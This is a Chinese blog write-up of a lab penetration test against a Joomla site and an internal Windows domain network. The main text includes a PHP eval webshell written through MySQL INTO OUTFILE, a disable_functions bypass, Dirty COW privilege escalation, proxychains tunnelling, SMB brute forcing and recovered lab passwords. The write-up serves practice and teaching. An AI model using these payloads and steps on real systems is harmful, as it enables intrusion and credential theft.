第三次靶场渗透测试

于 2021-11-25 21:33:16 发布
阅读量5.4k 收藏 18
点赞数 8
分类专栏: 渗透测试练习 文章标签: php web安全 tcp/ip
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37450949/article/details/121428741
版权

信息搜集

打开网页发现是一个博客页面,使用 Wappalyzer 插件查看当前页面的信息
请添加图片描述
使用了名为 Joomla 的CMS,后端语言为PHP,使用 ping 命令发现 TTL 为 64 判断为 linux 系统
查看其端口:
请添加图片描述
发现CMS版本号
请添加图片描述
扫描目录

目录作用
1.phpphpinfo界面
/administrator后台登陆界面
/configuration.php~配置文件

在配置文件中发现 mysqli 账号密码,使用 navicat 连接
请添加图片描述

尝试get shell

mysql写马

在当前用户下查询权限,发现可以在任意目录进行文件读写的操作
请添加图片描述
结合在 phpinfo 界面得到的绝对路径信息,尝试写入一句话木马
select "<?php eval($_POST['cmd']);?>" into outfile "/var/www/html/zzz.php"
请添加图片描述
产生1045报错,无法写入

登陆后台

请添加图片描述
发现后台的超级管理员登陆账号密码
修改密码testadmin
尝试登陆
登陆后台后模板写入一句话

因为py到了后门,直接上车!

执行命令

请添加图片描述
发现命令无法执行
返回浏览 phpinfo 界面,发现许多函数被ban,于是需要使用蚁剑插件绕过 disable_functions
请添加图片描述
成功绕过

搜集主机信息

网卡信息

使用ifconfig命令查看当前机器的网卡信息
请添加图片描述
发现存在地址为 192.168.93.120 的内网地址

敏感文件信息

请添加图片描述
在目录中浏览发现一串用户名和密码,adduser是linux创建新用户的操作,尝试使用ssh连接

控制出网机、搭建隧道

SSH连接

发现密码被改了…
技术太拉爆破没成,原地上车 firefart:123456
请添加图片描述

搭建隧道

请添加图片描述
在tmp文件夹中上传隧道配置文件
请添加图片描述
提示文件权限不足,用户可以使用脏牛进行提权
参考文章 工具下载
提权后为文件赋予可执行权限
请添加图片描述
请添加图片描述
成功搭建隧道

内网信息搜集

内网存活主机探测

可以使用工具serverscan或者fscan
在出网机中上传fscan,并根据前面拿到的网卡信息进行扫描
使用命令./fscan -h 192.168.93.0/24
请添加图片描述
有5台存活主机
请添加图片描述
其中20 30 10为windows主机
请添加图片描述请添加图片描述
100 120已被拿下
并获得所有主机的端口开放信息
请添加图片描述

内网网络拓补

主机IP主机系统主机作用开放端口
192.168.93.100CentOS出网机22、80、3306
192.168.93.120Ubuntuweb服务器22、80、3306
192.168.93.10Windows Server 2012 R288、135、139、445
192.168.93.20win200880、135、139、445、1433
192.168.93.30win7135、139、445

尝试拿下域内的20主机

配置proxychains

  • 安装proxychains
    sudo apt-get install proxychains
  • 配置文件
    sudo vim /etc/proxychains.conf
  • 在最后一行改为 socks5 127.0.0.1:1234 即可

爆破SMB服务

使用proxychains msfconsole挂载代理启动msf
配置爆破设置后启动

请添加图片描述
得到账号、密码为Administrator:123qwe!ASD

控制20主机

莫名其妙上了个3389的车,直接用远程桌面发现存在域控
请添加图片描述
请添加图片描述
发现主机10为域控

不想弹solo
关注
  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
VulnHub-Chill-Hack 1 靶场渗透实验
qq_56724121的博客
04-27 548
VulnHub-Chill-Hack 1 靶场渗透实验 一、信息收集 1、收集靶机的ip nmap来扫描存活的主机 nmap -sn 192.168.226.0/24( -v表示显示过程) 根据扫描的结果,可以继续验证目标靶机的ip 确定目标靶机地址是192.168.226.131 2、根据得到的靶机ip,继续扫描靶机相关的服务开放情况 nmap -sC -sV 192.168.226.131 -p- --min-rate=2000 -n -vv -sC –...
渗透测试靶场
任浩的博客
02-15 578
sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:http://xss-quiz.int21h.jp/ xss-labs 基于跨站脚本攻击一个漏洞靶机,也是一款基于通关形式的靶机 在线地址:http://test.x
DC-2靶场-渗透测试
negnegil的博客
06-06 698
靶机:DC-2 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后导入和kali相同的虚拟机平台即可 靶场的网络模式设置为桥接模式,启动 1.先以ARP扫描以下局域网内靶机的ip arp-scan -l netdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索 2.使用nmap扫一下ip查看端口开放 nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
VulnHub渗透测试实战靶场 - DevContainer:1
LYJ20010728的博客
08-24 447
VulnHub渗透测试实战靶场 - DevContainer:1题目描述环境下载DevContainer:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权Flag-1Flag-2 题目描述 Goal: 2 flagas Difficulty: Easy-intermediate Information: Your feedback is appreciate: Twitter: @0x04E1 This works better with VirtualBox rather than VMware
VulnHub渗透测试实战靶场 - SICKOS: 1.1
LYJ20010728的博客
08-08 1875
VulnHub渗透测试实战靶场 - SICKOS: 1.1环境下载SICKOS: 1.1靶机搭建渗透测试信息搜集 环境下载 戳此进行环境下载 SICKOS: 1.1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l ...
web安全渗透测试.7z
04-08
9. **靶场源码** - 仿真Web应用,用于练习和测试渗透测试技术,提供安全漏洞的环境。 10. **轻量WEB指纹识别** - 可能是指一款轻便的Web服务器指纹识别工具,用于识别目标Web服务器的类型和版本,这在规划渗透测试...
渗透测试基础教程_ppt.rar
07-12
同时,我们会讲解如何设置渗透测试的工作环境,包括虚拟机的配置和靶场的搭建。 第3章:信息收集与漏洞扫描 在渗透测试中,信息收集是至关重要的第一步。本章将详细解释如何通过公开来源获取目标信息,如DNS查询、...
DVWA靶场,集成了owasp top 10漏洞
03-28
通过DVWA靶场的学习,你可以深入了解这些漏洞,提升自己的渗透测试技能,并了解如何为实际环境中的Web应用程序构建更强大的安全防护。同时,对于开发人员来说,这是一个绝佳的平台,可以用来增强对安全编码的理解,...
WebShell文件上传漏洞分析溯源(第3题)
02-22
打开测试靶场上传页面,上传已经命名的 8.jpg 文件。 ### 步骤 3:拦截上传代码 使用 Burp 拦截工具拦截上传的代码,并修改文件名为 8.php。 ### 步骤 4:查看返回路径 返回路径查看照片是否正常显示。如果照片...
CSRF的脚本,可以做测试使用.zip
05-28
- SameSite Cookie属性:设置Cookie的SameSite属性为"Lax"或"Strict",限制第三方网站提交Cookie。 5. 渗透测试的重要性: 通过像"CSRF的脚本,可以做测试使用.zip"这样的资源,安全从业者可以模拟攻击,找出系统...
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
VulnHub渗透测试实战靶场-HA:NARAK
LYJ20010728的博客
08-20 823
VulnHub渗透测试实战靶场-HA:NARAK环境下载HA:NARAK靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 HA:NARAK靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.140 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3
LYJ20010728的博客
08-06 1423
VulnHub渗透测试实战靶场 - FRISTILEAKS: 1.3环境下载TOPHATSEC: FRESHLY靶机搭建渗透测试信息搜集漏洞挖掘 环境下载 戳此进行环境下载 TOPHATSEC: FRESHLY靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式,虚拟机的MAC地址为:08:00:27:A5:A6:76 获取到目标靶机的IP为:192.168.246.132 渗透测试 信息搜集 用Nmap扫描一下目标靶机:sudo nmap -sS -A 192.168.246.
billu b0x靶场渗透测试
L_lemo004的博客
07-12 779
扫描IP 由于我的内网网段为31,所以我使用ipscan工具扫描31段的存活主机 发现192.168.31.16疑似靶场IP,访问看看,成功访问,界面是白胡子 页面提示我们用SQL注入获取用户名密码,在输入框尝试注入,输入admin’ ,弹出try again提示框,说明无法注入 文件包含 无法注入,我们可以尝试爆破目录看看有没有什么突破点 得到页面较多,test.php、add.php、...
DC系列漏洞靶场-渗透测试学习复现(DC-8)
W983079520的博客
12-10 1851
DC-8是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了shell反弹和exim提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-8靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。
靶场渗透(二)——Acid渗透
Ramona的博客
08-02 885
测试环境 靶机:Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
靶场实验练习笔记
hyy_ideal的博客
11-21 590
目录实验靶场练习笔记实验要求实验环境实验要求实验开始弱口令登陆网站后台文件上传漏洞进入内网导出导入 实验靶场练习笔记 实验要求 找出靶场中的5个flag 实验环境 靶机下载地址: ( 注:win2003为外网可访问机器,linux为内网机器 ) 配置环境: 设置win2003 网卡为nat ;物理机网卡Adapter for VMnet8设置为100网段 外网机器ip为192.168....
靶场渗透(四)——FristiLeaks渗透
Ramona的博客
08-07 725
测试环境 靶机:firstiLeaks打开虚拟机后设为nat模式,更改mac地址为08:00:27:A5:A6:76 攻击机:kali,windows10 信息收集 • Netdiscover搜索主机位置(nmap也可以) Netdiscover –r 192.168.111.0/24 获取到靶机ip为192.168.111.137 • masscan(nmap)端口扫描 ma...
多节点靶场渗透2
seer233的博客
11-22 393
目录多节点靶场渗透2环境搭建实验要求及已知信息靶场网址实验过程信息收集外网渗透在这里插入图片描述](https://img-blog.csdnimg.cn/20191121170713936.png)![在这里插入图片描述内网渗透 多节点靶场渗透2 环境搭建 靶机搭建在靶机搭建在vmware上,网卡为nat,攻击机为win10 物理机网卡vment8IP设为100网段 实验要求及已知信息 在...
web渗透测试靶场cms
最新发布
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了各种漏洞和安全问题供你尝试攻击和修复。 DVWA是一个非常受欢迎的靶场CMS,它包含了多个安全漏洞,例如SQL注入、跨站脚本攻击(XSS)和文件上传漏洞等。OWASP Juice Shop是一个现代化的Web应用程序,旨在模拟真实世界中常见的安全问题。WebGoat是另一个非常受欢迎的靶场CMS,它提供了一系列挑战和实验,帮助你学习各种Web应用程序漏洞。 通过使用这些靶场CMS,你可以积极主动地学习和测试不同类型的Web应用程序漏洞,提高你的渗透测试技能。记得在使用靶场CMS进行渗透测试时,要遵守法律和道德规范,并且只在合法的环境中进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不想弹solo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值